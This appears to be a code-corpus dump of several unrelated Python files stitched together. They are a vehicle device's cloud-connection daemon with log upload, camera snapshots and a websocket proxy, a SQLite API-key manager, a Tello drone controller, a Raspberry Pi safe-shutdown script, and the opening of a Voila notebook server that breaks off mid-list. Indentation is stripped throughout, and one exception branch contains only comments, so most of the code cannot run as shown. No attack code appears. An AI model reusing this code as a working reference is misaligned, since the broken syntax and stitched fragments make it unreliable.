def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if i is not None]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
dongle_id = Params().get("DongleId", encoding='utf-8')
api = Api(dongle_id)
manage_tokens(api)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
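      # split long messages into WS_FRAME_SIZE chunks: the first frame is TEXT,
      # the rest are CONT, with the fin flag set on the last one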
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
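  # randomized exponential backoff, capped at 128 seconds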
return random.randrange(0, min(128, int(2 ** retries)))
def manage_tokens(api):
if not TICI:
return
try:
params = Params()
mapbox = api.get(f"/v1/tokens/mapbox/{api.dongle_id}/", timeout=5.0, access_token=api.get_token())
if mapbox.status_code == 200:
params.put("MapboxToken", mapbox.json()["token"])
else:
params.delete("MapboxToken")
except Exception:
cloudlog.exception("Failed to update tokens")
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
# params.delete("PrimeRedirected")
manage_tokens(api)
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
# params.delete("PrimeRedirected")
# params.delete("LastAthenaPingTime")
except socket.timeout:
# try:
# r = requests.get("http://api.retropilot.org/v1/me", allow_redirects=False,
# headers={"User-Agent": f"openpilot-{version}"}, timeout=15.0)
# if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
# params.put_bool("PrimeRedirected", True)
# except Exception:
# cloudlog.exception("athenad.socket_timeout.exception")
# params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
# params.delete("PrimeRedirected")
# params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
_sqlite_access.py
|
import sqlite3
import os
import uuid
import threading
from datetime import datetime, timedelta
from typing import List, Tuple, Optional
from settings import settings
class SQLiteAccess:
def __init__(self):
self.db_location = settings.FASTAPI_SIMPLE_SECURITY_DB_LOCATION
# try:
# self.db_location = os.environ["FASTAPI_SIMPLE_SECURITY_DB_LOCATION"]
# except KeyError:
# self.db_location = "apikeys.sqlite"
self.expiration_limit = settings.FAST_API_SIMPLE_SECURITY_AUTOMATIC_EXPIRATION
# try:
# self.expiration_limit = int(os.environ["FAST_API_SIMPLE_SECURITY_AUTOMATIC_EXPIRATION"])
# except KeyError:
# self.expiration_limit = 15
self.init_db()
def init_db(self):
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
c.execute(
"""
CREATE TABLE IF NOT EXISTS fastapi_simple_security (
api_key TEXT PRIMARY KEY,
is_active INTEGER,
never_expire INTEGER,
expiration_date TEXT,
latest_query_date TEXT,
total_queries INTEGER)
"""
)
connection.commit()
def create_key(self, never_expire: bool) -> str:
api_key = str(uuid.uuid4())
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
c.execute(
"""
INSERT INTO fastapi_simple_security
(api_key, is_active, never_expire, expiration_date, latest_query_date, total_queries)
VALUES(?, ?, ?, ?, ?, ?)
""",
(
api_key,
1,
1 if never_expire else 0,
(datetime.utcnow() + timedelta(days=self.expiration_limit)).isoformat(timespec="seconds"),
None,
0,
),
)
connection.commit()
return api_key
def renew_key(self, api_key: str, new_expiration_date: str) -> Optional[str]:
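        """
        Renews an API key, reactivating it if it was revoked or expired
        Args:
            api_key: the API key to renew
            new_expiration_date: optional ISO 8601 date; if empty, defaults to
                now plus the configured expiration limit
        """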
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
# We run the query like check_key but will use the response differently
c.execute(
"""
SELECT is_active, total_queries, expiration_date, never_expire
FROM fastapi_simple_security
WHERE api_key = ?""",
(api_key,),
)
response = c.fetchone()
# API key not found
if not response:
return "API key not found"
response_lines = []
# Previously revoked key. Issue a text warning and reactivate it.
if response[0] == 0:
response_lines.append("This API key was revoked and has been reactivated.")
# Expired key. Issue a text warning and reactivate it.
if (not response[3]) and (datetime.fromisoformat(response[2]) < datetime.utcnow()):
response_lines.append("This API key was expired and is now renewed.")
if not new_expiration_date:
parsed_expiration_date = (datetime.utcnow() + timedelta(days=self.expiration_limit)).isoformat(
timespec="seconds"
)
else:
try:
# We parse and re-write to the right timespec
parsed_expiration_date = datetime.fromisoformat(new_expiration_date).isoformat(timespec="seconds")
except ValueError:
return "The expiration date could not be parsed. Please use ISO 8601."
c.execute(
"""
UPDATE fastapi_simple_security
SET expiration_date = ?, is_active = 1
WHERE api_key = ?
""",
(parsed_expiration_date, api_key,),
)
connection.commit()
response_lines.append(f"The new expiration date for the API key is {parsed_expiration_date}")
return " ".join(response_lines)
def revoke_key(self, api_key: str):
"""
Revokes an API key
Args:
api_key: the API key to revoke
"""
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
c.execute(
"""
UPDATE fastapi_simple_security
SET is_active = 0
WHERE api_key = ?
""",
(api_key,),
)
connection.commit()
def check_key(self, api_key: str) -> bool:
"""
Checks if an API key is valid
Args:
api_key: the API key to validate
"""
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
c.execute(
"""
SELECT is_active, total_queries, expiration_date, never_expire
FROM fastapi_simple_security
WHERE api_key = ?""",
(api_key,),
)
response = c.fetchone()
if (
# Cannot fetch a row
not response
# Inactive
or response[0] != 1
# Expired key
or ((not response[3]) and (datetime.fromisoformat(response[2]) < datetime.utcnow()))
):
# The key is not valid
return False
else:
# The key is valid
# We run the logging in a separate thread as writing takes some time
threading.Thread(target=self._update_usage, args=(api_key, response[1],)).start()
# We return directly
return True
def _update_usage(self, api_key: str, usage_count: int):
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
            # If we get here, it means this is an active API key that exists in the database. We update the table.
c.execute(
"""
UPDATE fastapi_simple_security
SET total_queries = ?, latest_query_date = ?
WHERE api_key = ?
""",
(usage_count + 1, datetime.utcnow().isoformat(timespec="seconds"), api_key),
)
connection.commit()
def get_usage_stats(self) -> List[Tuple[str, int, str, str, int]]:
"""
Returns usage stats for all API keys
Returns:
a list of tuples with values being api_key, is_active, expiration_date, latest_query_date, and total_queries
"""
with sqlite3.connect(self.db_location) as connection:
c = connection.cursor()
# TODO Add filtering somehow
c.execute(
"""
SELECT api_key, is_active, never_expire, expiration_date, latest_query_date, total_queries
FROM fastapi_simple_security
ORDER BY latest_query_date DESC
""",
)
response = c.fetchall()
return response
sqlite_access = SQLiteAccess()
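
# A minimal usage sketch (assumes the `settings` module above is importable and
# FASTAPI_SIMPLE_SECURITY_DB_LOCATION points at a writable path); the key
# lifecycle is create -> check on every request -> renew or revoke:
if __name__ == "__main__":
    access = SQLiteAccess()
    key = access.create_key(never_expire=False)
    assert access.check_key(key)       # valid until its expiration_date
    print(access.renew_key(key, ""))   # empty date renews by the default limit
    access.revoke_key(key)
    assert not access.check_key(key)   # revoked keys are rejected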
|
tello.py
|
import socket
import threading
import time
import cv2
from easytello.stats import Stats
from easytello.tello_control import TelloControl
class Tello:
    def __init__(self, tello_ip: str = '192.168.10.1', debug: bool = True):
        # Added
self.lastframe = None
self.controller: TelloControl = None
# Opening local UDP port on 8889 for Tello communication
self.local_ip = ''
self.local_port = 8889
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind((self.local_ip, self.local_port))
# Setting Tello ip and port info
self.tello_ip = tello_ip
self.tello_port = 8889
self.tello_address = (self.tello_ip, self.tello_port)
self.log = []
        # Initializing response thread
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon = True
self.receive_thread.start()
# easyTello runtime options
self.stream_state = False
self.MAX_TIME_OUT = 15.0
self.debug = debug
# Setting Tello to command mode
self.command()
def set_controller(self, controller: TelloControl):
self.controller = controller
    def send_command(self, command: str, query: bool = False):
# New log entry created for the outbound command
self.log.append(Stats(command, len(self.log)))
# Sending command to Tello
self.socket.sendto(command.encode('utf-8'), self.tello_address)
        # Displaying confirmation message (if 'debug' is True)
if self.debug is True:
print('Sending command: {}'.format(command))
# Checking whether the command has timed out or not (based on value in 'MAX_TIME_OUT')
start = time.time()
        while not self.log[-1].got_response():  # Runs while no response has been received in log
now = time.time()
difference = now - start
if difference > self.MAX_TIME_OUT:
print('Connection timed out!')
break
# Prints out Tello response (if 'debug' is True)
if self.debug is True and query is False:
print('Response: {}'.format(self.log[-1].get_response()))
def _receive_thread(self):
while True:
# Checking for Tello response, throws socket error
try:
self.response, ip = self.socket.recvfrom(1024)
self.log[-1].add_response(self.response)
if self.controller is not None:
self.controller.on_success()
except socket.error as exc:
print('Socket error: {}'.format(exc))
if self.controller is not None:
self.controller.on_missing()
def get_position(self):
return self.controller.get_position()
def _video_thread(self):
# Creating stream capture object
cap = cv2.VideoCapture('udp://'+self.tello_ip+':11111')
# Runs while 'stream_state' is True
while self.stream_state:
ret, frame = cap.read()
self.lastframe = frame
            # cv2.imshow('DJI Tello', frame)  # window display removed
# Video Stream is closed if escape key is pressed
k = cv2.waitKey(1) & 0xFF
if k == 27:
break
cap.release()
#cv2.destroyAllWindows()
def read(self):
return self.lastframe
def wait(self, delay: float):
# Displaying wait message (if 'debug' is True)
if self.debug is True:
print('Waiting {} seconds...'.format(delay))
# Log entry for delay added
self.log.append(Stats('wait', len(self.log)))
# Delay is activated
time.sleep(delay)
def get_log(self):
return self.log
    # Control Commands
def command(self):
self.send_command('command')
def takeoff(self):
self.send_command('takeoff')
def land(self):
self.send_command('land')
def streamon(self):
self.send_command('streamon')
self.stream_state = True
self.video_thread = threading.Thread(target=self._video_thread)
self.video_thread.daemon = True
self.video_thread.start()
def streamoff(self):
self.stream_state = False
self.send_command('streamoff')
def emergency(self):
self.send_command('emergency')
# Movement Commands
def up(self, dist: int):
self.send_command('up {}'.format(dist))
def down(self, dist: int):
self.send_command('down {}'.format(dist))
def left(self, dist: int):
self.send_command('left {}'.format(dist))
def right(self, dist: int):
self.send_command('right {}'.format(dist))
def forward(self, dist: int):
self.send_command('forward {}'.format(dist))
def back(self, dist: int):
self.send_command('back {}'.format(dist))
def cw(self, degr: int):
self.send_command('cw {}'.format(degr))
def ccw(self, degr: int):
self.send_command('ccw {}'.format(degr))
def flip(self, direc: str):
self.send_command('flip {}'.format(direc))
def go(self, x: int, y: int, z: int, speed: int):
self.send_command('go {} {} {} {}'.format(x, y, z, speed))
def curve(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed))
# Set Commands
def set_speed(self, speed: int):
self.send_command('speed {}'.format(speed))
def rc_control(self, a: int, b: int, c: int, d: int):
self.send_command('rc {} {} {} {}'.format(a, b, c, d))
def set_wifi(self, ssid: str, passwrd: str):
self.send_command('wifi {} {}'.format(ssid, passwrd))
# Read Commands
def get_speed(self):
self.send_command('speed?', True)
return self.log[-1].get_response()
def get_battery(self):
self.send_command('battery?', True)
return self.log[-1].get_response()
def get_time(self):
self.send_command('time?', True)
return self.log[-1].get_response()
def get_height(self):
self.send_command('height?', True)
return self.log[-1].get_response()
def get_temp(self):
self.send_command('temp?', True)
return self.log[-1].get_response()
def get_attitude(self):
self.send_command('attitude?', True)
return self.log[-1].get_response()
def get_baro(self):
self.send_command('baro?', True)
return self.log[-1].get_response()
def get_acceleration(self):
self.send_command('acceleration?', True)
return self.log[-1].get_response()
def get_tof(self):
self.send_command('tof?', True)
return self.log[-1].get_response()
def get_wifi(self):
self.send_command('wifi?', True)
return self.log[-1].get_response()
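
# A minimal usage sketch (assumes a real Tello is reachable at the default
# 192.168.10.1 address; note that constructing Tello() already sends the
# initial 'command' handshake, so only run this while connected to the drone):
if __name__ == "__main__":
    drone = Tello()
    print('Battery:', drone.get_battery())
    drone.takeoff()
    drone.cw(90)   # rotate 90 degrees clockwise
    drone.land()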
|
recalbox_SafeShutdown.py
|
import RPi.GPIO as GPIO
import os
import time
from multiprocessing import Process
#initialize pins
powerPin = 3 #pin 5
ledPin = 14 #TXD
resetPin = 2 #pin 3
powerenPin = 4 #pin 7
#initialize GPIO settings
def init():
GPIO.setmode(GPIO.BCM)
GPIO.setup(powerPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(resetPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(ledPin, GPIO.OUT)
GPIO.setup(powerenPin, GPIO.OUT)
GPIO.output(powerenPin, GPIO.HIGH)
GPIO.setwarnings(False)
#issues the shutdown (halt) command when the power button is pressed
def poweroff():
    while True:
        GPIO.wait_for_edge(powerPin, GPIO.FALLING)
        os.system("shutdown -h now")
#blinks the LED to signal button being pushed
def ledBlink():
while True:
GPIO.output(ledPin, GPIO.HIGH)
GPIO.wait_for_edge(powerPin, GPIO.FALLING)
start = time.time()
while GPIO.input(powerPin) == GPIO.LOW:
GPIO.output(ledPin, GPIO.LOW)
time.sleep(0.2)
GPIO.output(ledPin, GPIO.HIGH)
time.sleep(0.2)
#resets the pi
def reset():
while True:
GPIO.wait_for_edge(resetPin, GPIO.FALLING)
os.system("shutdown -r now")
if __name__ == "__main__":
#initialize GPIO settings
init()
#create a multiprocessing.Process instance for each function to enable parallelism
powerProcess = Process(target = poweroff)
powerProcess.start()
ledProcess = Process(target = ledBlink)
ledProcess.start()
resetProcess = Process(target = reset)
resetProcess.start()
powerProcess.join()
ledProcess.join()
resetProcess.join()
GPIO.cleanup()
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import gettext
import io
import sys
import json
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets.config.loader import Config
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.kernelmanager import AsyncMappingKernelManager
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import FileFindHandler, path_regex
from jupyter_server.config_manager import recursive_update
from jupyter_server.utils import url_path_join, run_sync
from jupyter_server.services.config import ConfigManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, collect_static_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, TemplateStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutor
from .exporter import VoilaExporter
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': (
{'Voila': {'log_level': logging.DEBUG, 'show_tracebacks': True}},
_("Set the log level to logging.DEBUG, and show exception tracebacks in output.")
),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the Voilà server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
            'Automatically reload the server and the page when a template, JS file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions'
}
classes = [
VoilaConfiguration,
VoilaExecutor,
VoilaExporter
]
connection_dir_root = Unicode(
config=True,
help=_(
            'Location of temporary connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for Voilà API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
            If server_url is set, the server will serve the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
            'Path prefix for the Voilà API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with Voilà'
)
)
template_paths = List(
[],
config=True,
help=_(
'path to jinja2 templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
show_tracebacks = Bool(False, config=True, help=_(
'Whether to send tracebacks to clients on exceptions.'
))
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overrideable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
def initialize(self, argv=None):
self._init_asyncio_patch()
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
template_name = self.voila_configuration.template
self.template_paths = collect_template_paths(['voila', 'nbconvert'], template_name, prune=True)
self.static_paths = collect_static_paths(['voila', 'nbconvert'], template_name)
conf_paths = [os.path.join(d, 'conf.json') for d in self.template_paths]
for p in conf_paths:
# see if config file exists
if os.path.exists(p):
# load the template-related config
with open(p) as json_file:
conf = json.load(json_file)
# update the overall config with it, preserving CLI config priority
if 'traitlet_configuration' in conf:
recursive_update(conf['traitlet_configuration'], self.voila_configuration.config.VoilaConfiguration)
# pass merged config to overall Voilà config
self.voila_configuration.config.VoilaConfiguration = Config(conf['traitlet_configuration'])
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
self.kernel_manager = AsyncMappingKernelManager(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_open',
'comm_close',
'comm_msg',
'comm_info_request',
'kernel_info_request',
